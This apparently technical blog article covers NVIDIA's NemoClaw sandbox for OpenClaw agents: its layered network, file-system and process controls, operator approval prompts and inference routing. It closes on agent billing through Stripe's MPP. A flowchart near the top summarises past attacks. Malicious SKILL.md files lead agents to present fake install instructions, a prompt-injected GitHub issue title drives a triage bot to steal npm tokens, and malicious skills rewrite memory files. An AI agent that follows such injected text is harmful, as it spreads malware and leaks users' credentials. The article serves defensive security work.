NemoClaw and Stripe MPP for OpenClaw agent billing security
Contents
If an agent is isolated in a sandbox, the file system is restricted and the network is whitelisted. But what happens when the agent needs to call an external API service that bills you?
Looking at NVIDIA’s OpenClaw sandbox plugin NemoClaw and Stripe’s Machine Payments Protocol (MPP) together gives a clue.
Why a sandbox is needed
OpenClaw has accumulated a long security history:
- AMOS distribution through malicious SKILL.md files
- Clinejection and npm token theft through prompt injection
- RCE, supply-chain contamination, and memory poisoning
- Local sandbox predecessors such as Agent Safehouse and Codex sandboxing
flowchart TD
A["ClawHub / SkillsMP / skills.sh"] -->|malicious SKILL.md| B["OpenClaw agent"]
B -->|"AI presents fake install instructions"| C["AMOS infection"]
D["GitHub issue title"] -->|prompt injection| E["AI triage bot"]
E -->|"cache poisoning → npm token theft"| F["OpenClaw auto-install on 4,000 machines"]
G["CVE-2026-25253"] -->|"malicious gatewayUrl"| H["Token theft / RCE"]
I["malicious skills"] -->|"rewrite SOUL.md / MEMORY.md"| J["Memory poisoning"]The numbers are not small either: ClawHavoc doubled to 824 malicious skills, AMOS campaigns were broad, and CVE-2026-25253 exposed more than 30,000 public instances.
NemoClaw architecture
NemoClaw is an OpenClaw plugin that runs inside NVIDIA’s OpenShell secure runtime. It uses K3s in Docker and is released under Apache 2.0.
graph TD
A[OpenClaw\nagent core] --> B[OpenShell\nsecure runtime]
C[NemoClaw\nNVIDIA plugin] --> B
B --> D[K3s inside Docker\nKubernetes cluster]
D --> E[Sandbox environment]
E --> F[NVIDIA cloud\ninference endpoint]OpenShell also supports Claude Code, Codex, Ollama, and others, but NemoClaw is specialized for OpenClaw and NVIDIA inference.
The key difference from desktop sandboxing is that NemoClaw is a server-side protection layer built around K3s clusters.
Blueprint architecture
NemoClaw has two layers:
| Layer | Language | Role |
|---|---|---|
| Plugin | TypeScript | CLI and UI layer |
| Blueprint | Python | Orchestrates sandbox creation, policy application, and inference settings |
Blueprints move through a five-stage lifecycle:
graph LR
A[Resolve] --> B[Verify]
B --> C[Plan]
C --> D[Apply]
D --> E[Status]Verification checks the artifact digest, which matters because ClawHub skills have a history of being malicious.
Four-layer security
| Layer | Protection | Locking |
|---|---|---|
| Network | Block unauthorized outbound connections | Hot-reloadable |
| File system | Only allow /sandbox and /tmp writes | Fixed at sandbox creation |
| Process | Block privilege escalation and dangerous syscalls | Fixed at sandbox creation |
| Inference | Route model calls to controlled backends | Hot-reloadable |
The stack combines Landlock LSM, seccomp, and network namespaces. Network and inference policies can be updated without restarting the sandbox.
Binary-based network control
The baseline policy can restrict network access by binary, endpoint, and HTTP method:
| Endpoint | Limits |
|---|---|
api.anthropic.com:443 | claude binary only |
integrate.api.nvidia.com:443 | Inference |
github.com:443 / api.github.com:443 | gh / git binaries with method control |
openclaw.ai:443 / clawhub.com:443 | No limit |
registry.npmjs.org:443 | GET only |
If an agent tries to access something outside the baseline, the operator gets a TUI prompt in openshell term. Approval is only for the current session.
That leaves one concern: ClawHub itself is a malicious-skill source, so model-level defenses are still needed. File-system restrictions cannot stop prompt injection if a malicious SKILL.md enters the context.
Inference routing and cost control
Inference requests do not leave the sandbox directly. OpenShell intercepts them and forwards them to NVIDIA cloud.
sequenceDiagram
participant A as Agent (inside sandbox)
participant G as OpenShell Gateway
participant N as NVIDIA cloud (build.nvidia.com)
A->>G: Inference request
G->>N: Controlled routing
N->>G: Response
G->>A: Forward responseThe default model is Nemotron 3 Super 120B, and smaller or local models can also be configured. The gateway can track token usage and make inference costs visible, which matters for billing.
The billing problem
That brings us back to the original question: if the agent is sandboxed but still needs to use a paid external API, how do you let it pay without handing over private keys? Stripe’s MPP is the payment side of that answer, but the safe integration story is still being worked out.